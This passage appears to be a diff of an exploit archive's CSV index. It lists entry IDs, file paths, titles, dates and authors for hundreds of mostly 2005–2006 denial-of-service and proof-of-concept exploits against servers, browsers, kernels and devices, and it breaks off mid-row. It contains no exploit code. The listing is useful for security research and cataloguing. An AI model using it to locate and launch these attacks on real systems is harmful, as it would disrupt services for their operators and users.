+887,exploits/windows/dos/887.py,"MailEnable 1.8 - Remote Format String Denial of Service",2005-03-17,"Tal Zeltzer",dos,windows, +888,exploits/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service",2005-03-17,Ali7,dos,windows, +891,exploits/windows/dos/891.pl,"MCPWS Personal WebServer 1.3.21 - Denial of Service",2005-03-21,"Nico Spicher",dos,windows, +893,exploits/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service",2005-03-21,"GSS IT",dos,windows, +899,exploits/windows/dos/899.pl,"SPECTral Personal SMTP Server 0.4.2 - Denial of Service",2005-03-28,GreenwooD,dos,windows, +904,exploits/linux/dos/904.c,"Linux Kernel 2.6.10 - Local Denial of Service",2005-03-29,ChoiX,dos,linux, +908,exploits/windows/dos/908.c,"ArGoSoft FTP Server 1.4.2.8 - Denial of Service",2005-04-03,c0d3r,dos,windows, +911,exploits/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service",2005-04-04,"Daniel McNeil",dos,linux, +916,exploits/windows/dos/916.pl,"MailEnable Enterprise 1.x - SMTP Remote Denial of Service",2005-04-05,CorryL,dos,windows, +931,exploits/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling (MS05-020)",2005-04-12,Skylined,dos,windows, +941,exploits/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Vulnerabilities",2005-04-14,"Luigi Auriemma",dos,windows, +942,exploits/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",dos,windows, +946,exploits/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot (Denial of Service)",2005-04-19,ChoiX,dos,multiple, +948,exploits/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)",2005-04-20,houseofdabus,dos,multiple, +956,exploits/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - 'rsvp_print' Infinite Loop Denial of Service",2005-04-26,vade79,dos,multiple, +957,exploits/linux/dos/957.c,"Tcpdump 3.8.x - 'ldp_print' Infinite Loop Denial of Service",2005-04-26,vade79,dos,linux, +958,exploits/linux/dos/958.c,"Tcpdump 3.8.x - 'rt_routing_info' Infinite Loop Denial of Service",2005-04-26,vade79,dos,linux, +959,exploits/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 - 'isis_print' Infinite Loop Denial of Service",2005-04-26,vade79,dos,linux, +978,exploits/windows/dos/978.cpp,"Ashley's Web Server - Denial of Service",2005-05-04,basher13,dos,windows, +983,exploits/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,dos,windows, +984,exploits/multiple/dos/984.c,"Ethereal 0.10.10 - 'dissect_ipc_state' Remote Denial of Service",2005-05-07,Nicob,dos,multiple, +40381,exploits/android/dos/40381.txt,"Google Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",dos,android, +988,exploits/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,dos,windows, +998,exploits/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,dos,linux, +999,exploits/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,dos,linux, +1000,exploits/windows/dos/1000.cpp,"Microsoft Windows XP/2003 - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",dos,windows, +1008,exploits/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",dos,multiple, +1024,exploits/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crashs",2005-05-31,"Benjamin Franz",dos,windows, +1025,exploits/windows/dos/1025.html,"Microsoft Internet Explorer - JavaScript 'window()' Crash",2005-05-31,"Benjamin Franz",dos,windows, +1027,exploits/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,dos,windows, +1037,exploits/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,dos,multiple, +1056,exploits/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,dos,multiple, +1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)",2005-06-22,g30rg3_x,dos,php, +1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)",2005-06-22,HaCkZaTaN,dos,php, +1065,exploits/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)",2005-06-23,cybertronic,dos,windows, +1067,exploits/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,dos,windows, +1072,exploits/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service",2005-06-27,"Marco Del Percio",dos,multiple, +1090,exploits/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service",2005-07-06,basher13,dos,windows, +1093,exploits/windows/dos/1093.c,"PrivaShare 1.3 - Denial of Service",2005-07-07,basher13,dos,windows, +1094,exploits/windows/dos/1094.pl,"AnalogX SimpleServer:WWW 1.05 - Denial of Service",2005-07-07,Qnix,dos,windows, +1100,exploits/windows/dos/1100.pl,"Remote File Explorer 1.0 - Denial of Service",2005-07-11,basher13,dos,windows, +1101,exploits/windows/dos/1101.c,"SoftiaCom wMailServer 1.0 - Remote Denial of Service",2005-07-12,Kozan,dos,windows, +1104,exploits/windows/dos/1104.cpp,"Microsoft Windows - Netman Service Local Denial of Service",2005-07-14,bkbll,dos,windows, +1105,exploits/windows/dos/1105.c,"netPanzer 0.8 - Remote Denial of Service",2005-07-14,"Luigi Auriemma",dos,windows, +1107,exploits/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service",2005-07-15,basher13,dos,windows, +1109,exploits/windows/dos/1109.pl,"DzSoft PHP Editor 3.1.2.8 - Denial of Service",2005-07-15,basher13,dos,windows, +1110,exploits/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)",2005-07-15,"Edward Gagnon",dos,windows, +1116,exploits/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (1)",2005-07-21,snooq,dos,windows, +1121,exploits/windows/dos/1121.pl,"FTPshell Server 3.38 - Remote Denial of Service",2005-07-26,"Reed Arvin",dos,windows, +1126,exploits/windows/dos/1126.c,"BusinessMail Server 4.60.00 - Remote Denial of Service",2005-08-01,Kozan,dos,windows, +1127,exploits/windows/dos/1127.cpp,"ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash",2005-08-01,"evil dabus",dos,windows, +1129,exploits/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,dos,windows, +1137,exploits/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,dos,windows, +1143,exploits/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",dos,windows, +41796,exploits/multiple/dos/41796.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",dos,multiple, +1153,exploits/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",dos,hardware, +1156,exploits/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",dos,windows, +1157,exploits/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,dos,cgi, +1158,exploits/windows/dos/1158.pl,"Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow",2004-11-29,"Reed Arvin",dos,windows, +1159,exploits/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow",2004-12-01,"Reed Arvin",dos,windows, +1160,exploits/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - 'USER' Remote Buffer Overflow",2005-04-27,"Reed Arvin",dos,windows, +1162,exploits/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service",2005-06-07,"Reed Arvin",dos,windows, +1163,exploits/windows/dos/1163.pl,"IA eMailServer Corporate Edition 5.2.2 - Denial of Service",2005-06-26,"Reed Arvin",dos,windows, +1164,exploits/windows/dos/1164.pl,"BusinessMail Server 4.60.00 - Remote Buffer Overflow",2005-07-30,"Reed Arvin",dos,windows, +1165,exploits/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - 'SMTP' Buffer Overflow",2005-06-27,"Reed Arvin",dos,windows, +1166,exploits/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - 'FTP' Buffer Overflow",2005-06-27,"Reed Arvin",dos,windows, +1175,exploits/cgi/dos/1175.pl,"GTChat 0.95 Alpha - 'adduser' Remote Denial of Service",2005-08-23,VTECin5th,dos,cgi, +1176,exploits/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",dos,multiple, +1192,exploits/windows/dos/1192.cpp,"P2P Pro 1.0 - 'command' Denial of Service",2005-09-02,basher13,dos,windows, +1196,exploits/linux/dos/1196.c,"CUPS Server 1.1 - GET Denial of Service",2005-09-05,tracewar,dos,linux, +1199,exploits/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,dos,windows, +1204,exploits/multiple/dos/1204.html,"Mozilla Products - 'Host:' Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",dos,multiple, +1212,exploits/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,dos,windows, +1213,exploits/multiple/dos/1213.c,"Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,dos,multiple, +1218,exploits/windows/dos/1218.c,"Stoney FTPd - 'rxBot mods ftpd' Denial of Service",2005-09-16,D-oNe,dos,windows, +1220,exploits/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,dos,windows, +1222,exploits/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,dos,windows, +1233,exploits/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",dos,multiple, +1235,exploits/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion",2005-09-26,"Luigi Auriemma",dos,windows, +1239,exploits/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",dos,windows, +1246,exploits/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,dos,windows, +1251,exploits/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,dos,windows, +1253,exploits/multiple/dos/1253.html,"Mozilla Firefox 1.0.7 / Thunderbird 1.0.6 - Denial of Service",2005-10-16,posidron,dos,multiple, +1254,exploits/multiple/dos/1254.html,"Opera 8.02 - Remote Denial of Service (1)",2005-10-16,posidron,dos,multiple, +1255,exploits/windows/dos/1255.html,"Opera 8.02 - Remote Denial of Service (2)",2005-10-16,posidron,dos,windows, +1256,exploits/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (PoC)",2005-10-17,"Ulf Harnhammar",dos,multiple, +1257,exploits/multiple/dos/1257.html,"Mozilla Firefox 1.0.7 (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,dos,multiple, +1266,exploits/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow (PoC)",2005-10-20,Sowhat,dos,windows, +1268,exploits/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - Register Users Denial of Service",2005-10-21,DarkFig,dos,multiple, +1269,exploits/windows/dos/1269.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)",2005-10-21,anonymous,dos,windows, +1271,exploits/windows/dos/1271.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)",2005-10-24,"Winny Thomas",dos,windows, +1274,exploits/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - GET Remote Denial of Service",2005-10-27,Expanders,dos,hardware, +1276,exploits/windows/dos/1276.html,"Microsoft Internet Explorer 6 - 'mshtmled.dll' Denial of Service",2005-10-28,"Tom Ferris",dos,windows, +1281,exploits/windows/dos/1281.c,"Battle Carry .005 Socket Termination - Denial of Service",2005-11-02,"Luigi Auriemma",dos,windows, +1282,exploits/windows/dos/1282.c,"Blitzkrieg 2 < 1.21 - 'Server/Client' Denial of Service",2005-11-02,"Luigi Auriemma",dos,windows, +1283,exploits/windows/dos/1283.c,"FlatFrag 0.3 - Buffer Overflow / Denial of Service",2005-11-02,"Luigi Auriemma",dos,windows, +1284,exploits/windows/dos/1284.c,"Glider collectn kill 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",dos,windows, +1285,exploits/windows/dos/1285.c,"Scorched 3D 39.1 - Multiple Vulnerabilities (PoC)",2005-11-02,"Luigi Auriemma",dos,windows, +1286,exploits/windows/dos/1286.c,"GO-Global Windows Clients 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",dos,windows, +1287,exploits/windows/dos/1287.c,"GO-Global Windows Server 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",dos,windows, +1327,exploits/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",dos,windows, +1328,exploits/windows/dos/1328.c,"Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service",2005-11-16,"Winny Thomas",dos,windows, +1331,exploits/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - 'action' Denial of Service",2005-11-18,BassReFLeX,dos,multiple, +1336,exploits/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",dos,windows, +1338,exploits/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",dos,hardware, +1339,exploits/windows/dos/1339.c,"freeFTPd 1.0.10 - 'PORT' Denial of Service",2005-11-24,"Stefan Lochbihler",dos,windows, +1341,exploits/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)",2005-11-27,darkeagle,dos,windows, +1343,exploits/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",dos,windows, +1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php, +1346,exploits/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",dos,windows, +1353,exploits/windows/dos/1353.py,"WinEggDropShell 1.7 - Unauthenticated Multiple Remote Stack Overflows (PoC)",2005-12-02,Sowhat,dos,windows, +1362,exploits/windows/dos/1362.html,"Mozilla Firefox 1.5 - 'history.dat' Looping (PoC)",2005-12-07,ZIPLOCK,dos,windows, +1368,exploits/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",dos,windows, +1371,exploits/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,dos,windows, +1372,exploits/windows/dos/1372.html,"Microsoft Internet Explorer 6 - PRE Tag Multiple Single Tags Denial of Service Vulnerabilities",2005-12-14,"Markus Heer",dos,windows, +1376,exploits/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,dos,windows, +1377,exploits/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,dos,windows, +1389,exploits/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,dos,windows, +1390,exploits/multiple/dos/1390.c,"BZFlag 2.0.4 - undelimited string Denial of Service",2005-12-27,"Luigi Auriemma",dos,multiple, +1394,exploits/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,dos,windows, +1396,exploits/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,dos,windows, +1409,exploits/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Denial of Service",2006-01-07,FistFuXXer,dos,windows, +1411,exploits/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,dos,hardware, +1416,exploits/windows/dos/1416.c,"HomeFtp 1.1 - 'NLST' Denial of Service",2006-01-14,pi3ch,dos,windows, +1422,exploits/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,dos,windows, +1423,exploits/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - IMG / XML elements Denial of Service",2006-01-18,"Inge Henriksen",dos,windows, +1424,exploits/windows/dos/1424.pl,"TFTPD32 2.81 - GET Format String Denial of Service (PoC)",2006-01-19,"Critical Security",dos,windows, +1447,exploits/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)",2006-01-25,Pasv,dos,hardware, +1464,exploits/hardware/dos/1464.c,"Arescom NetDSL-1000 - 'TelnetD' Remote Denial of Service",2006-02-02,"Fabian Ramirez",dos,hardware, +1473,exploits/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - Reset Display Denial of Service",2006-02-06,"Pierre Betouin",dos,hardware, +1475,exploits/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service",2006-02-07,"Tom Ferris",dos,windows, +1483,exploits/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,dos,multiple, +1488,exploits/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,dos,windows, +1489,exploits/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - Register Users Denial of Service",2006-02-10,SkOd,dos,multiple, +1496,exploits/hardware/dos/1496.c,"D-Link Wireless Access Point - Fragmented UDP Denial of Service",2006-02-14,"Aaron Portnoy",dos,hardware, +1500,exploits/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,dos,windows, +1517,exploits/php/dos/1517.c,"PunBB 2.0.10 - Register Multiple Users Denial of Service",2006-02-20,K4P0,dos,php, +1531,exploits/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",dos,windows, +1535,exploits/windows/dos/1535.c,"CrossFire 1.8.0 - 'oldsocketmode' Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",dos,windows, +1540,exploits/bsd/dos/1540.pl,"FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)",2006-02-28,"Evgeny Legerov",dos,bsd, +1551,exploits/hardware/dos/1551.txt,"Multiple Routers - 'IRC Request' Disconnect Denial of Service",2006-03-04,"Ryan Meyer",dos,hardware, +1552,exploits/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,dos,windows, +1557,exploits/windows/dos/1557.c,"Freeciv 2.0.7 - Jumbo Malloc Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",dos,windows, +1558,exploits/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",dos,windows, +1559,exploits/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple Buffer Overflow / Crash",2006-03-06,"Luigi Auriemma",dos,windows, +1560,exploits/windows/dos/1560.c,"Cube 2005_08_29 - Multiple Buffer Overflow / Crash",2006-03-06,"Luigi Auriemma",dos,windows, +1564,exploits/windows/dos/1564.c,"Alien Arena 2006 Gold Edition 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",dos,windows, +1572,exploits/multiple/dos/1572.pl,"Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service",2006-03-10,str0ke,dos,multiple, +1573,exploits/php/dos/1573.php,"Guppy 4.5.11 - Delete Databases Remote Denial of Service",2006-03-10,trueend5,dos,php, +1593,exploits/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - 'IMAP' Denial of Service",2006-03-19,Omni,dos,windows, +1598,exploits/windows/dos/1598.html,"Microsoft Internet Explorer 6 - Script Action Handlers 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",dos,windows, +1599,exploits/windows/dos/1599.cpp,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",dos,windows, +1601,exploits/windows/dos/1601.c,"ASP.NET w3wp - COM Components Remote Crash",2006-03-22,"Debasis Mohanty",dos,windows, +1603,exploits/windows/dos/1603.c,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,dos,windows, +1604,exploits/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",dos,windows, +1613,exploits/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",dos,windows, +1614,exploits/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",dos,windows, +1615,exploits/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (PoC)",2006-03-27,posidron,dos,windows, +1622,exploits/multiple/dos/1622.pl,"RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)",2006-03-28,"Federico L. Bossi Bonin",dos,multiple, +1633,exploits/windows/dos/1633.c,"Total Commander 6.x - 'unacev2.dll' Buffer Overflow (PoC)",2006-04-02,darkeagle,dos,windows, +1634,exploits/linux/dos/1634.pl,"mpg123 0.59r - Malformed .mp3 (SIGSEGV) (PoC)",2006-04-02,nitr0us,dos,linux, +1641,exploits/linux/dos/1641.pl,"Libxine 1.14 - MPEG Stream Buffer Overflow (PoC)",2006-04-04,"Federico L. Bossi Bonin",dos,linux, +1642,exploits/windows/dos/1642.c,"Ultr@VNC 1.0.1 - VNCLog::ReallyPrint Remote Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",dos,windows, +1643,exploits/windows/dos/1643.c,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",dos,windows, +1651,exploits/php/dos/1651.php,"ADODB < 4.70 - 'tmssql.php' Denial of Service",2006-04-09,rgod,dos,php, +1657,exploits/linux/dos/1657.asm,"Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service",2006-04-09,fingerout,dos,linux, +1667,exploits/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,dos,multiple, +1671,exploits/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,dos,multiple, +1688,exploits/windows/dos/1688.c,"Neon Responder 5.4 - Clock Synchronization Denial of Service",2006-04-17,"Stefan Lochbihler",dos,windows, +1708,exploits/windows/dos/1708.txt,"Skulltag 0.96f - Version String Remote Format String (PoC)",2006-04-23,"Luigi Auriemma",dos,windows, +1709,exploits/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",dos,multiple, +1712,exploits/osx/dos/1712.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",dos,osx, +1715,exploits/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - 'ROWSPAN' Denial of Service (PoC)",2006-04-24,"Yannick von Arx",dos,osx, +1716,exploits/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - 'js320.dll/xpcom_core.dll' Denial of Service (PoC)",2006-04-24,splices,dos,multiple, +1718,exploits/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,dos,hardware, +1721,exploits/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow (PoC)",2006-04-27,"Dedi Dwianto",dos,windows, +1743,exploits/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",dos,windows, +1746,exploits/linux/dos/1746.pl,"zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",dos,linux, +1748,exploits/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,dos,windows, +1749,exploits/windows/dos/1749.pl,"acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,Preddy,dos,windows, +1754,exploits/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - 'USER' Unauthenticated Remote Denial of Service",2006-05-05,Bigeazer,dos,windows, +1757,exploits/windows/dos/1757.c,"acFTP FTP Server 1.4 - 'USER' Remote Denial of Service",2006-05-06,Omni,dos,windows, +1758,exploits/windows/dos/1758.pl,"TinyFTPD 1.4 - 'USER' Remote Buffer Overflow Denial of Service",2006-05-06,[Oo],dos,windows, +1775,exploits/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - CSS Attribute Denial of Service",2006-05-10,seven,dos,windows, +1781,exploits/windows/dos/1781.txt,"outgun 1.0.3 bot 2 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",dos,windows, +1782,exploits/windows/dos/1782.txt,"Empire 4.3.2 - 'strncat' Denial of Service",2006-05-14,"Luigi Auriemma",dos,windows, +1783,exploits/windows/dos/1783.txt,"Genecys 0.2 - Buffer Overflow / NULL pointer Denial of Service",2006-05-14,"Luigi Auriemma",dos,windows, +1784,exploits/windows/dos/1784.txt,"raydium svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",dos,windows, +1792,exploits/windows/dos/1792.txt,"GNUnet 0.7.0d - Empty UDP Packet Remote Denial of Service",2006-05-15,"Luigi Auriemma",dos,windows, +1801,exploits/multiple/dos/1801.txt,"libextractor 0.5.13 - Multiple Heap Overflows (PoC)",2006-05-17,"Luigi Auriemma",dos,multiple, +1802,exploits/multiple/dos/1802.html,"Mozilla Firefox 1.5.0.3 - 'Loop' Denial of Service",2006-05-18,"Gianni Amato",dos,multiple, +1815,exploits/linux/dos/1815.c,"portmap 5 Beta - 'Set/Dump' Local Denial of Service",2006-05-22,"Federico L. Bossi Bonin",dos,linux, +1819,exploits/multiple/dos/1819.txt,"PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow Denial of Service",2006-05-23,"Luigi Auriemma",dos,multiple, +1820,exploits/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - 'frameNum' Server Terminiation",2006-05-23,"Luigi Auriemma",dos,multiple, +1838,exploits/windows/dos/1838.html,"Microsoft Internet Explorer - HTML Tag Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",dos,windows, +1852,exploits/linux/dos/1852.c,"gxine 0.5.6 - HTTP Plugin Remote Buffer Overflow (PoC)",2006-05-30,"Federico L. Bossi Bonin",dos,linux, +1856,exploits/windows/dos/1856.url,"Microsoft Internet Explorer 6 - 'inetconn.dll' Stack Overflow Crash",2006-05-31,Mr.Niega,dos,windows, +1867,exploits/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - 'marquee' Denial of Service",2006-06-02,n00b,dos,multiple, +1880,exploits/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",dos,linux, +1894,exploits/linux/dos/1894.py,"0verkill 0.16 - ASCII-ART Game Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",dos,linux, +1927,exploits/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,dos,windows, +1935,exploits/windows/dos/1935.cpp,"Winamp 5.21 - '.Midi' File Header Handling Buffer Overflow (PoC)",2006-06-20,BassReFLeX,dos,windows, +1937,exploits/multiple/dos/1937.html,"Opera 9 - long href Remote Denial of Service",2006-06-21,N9,dos,multiple, +1947,exploits/multiple/dos/1947.c,"BitchX 1.1-final - 'do_hook()' Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",dos,multiple, +1949,exploits/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)",2006-06-24,"Jerome Athias",dos,windows, +1967,exploits/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol 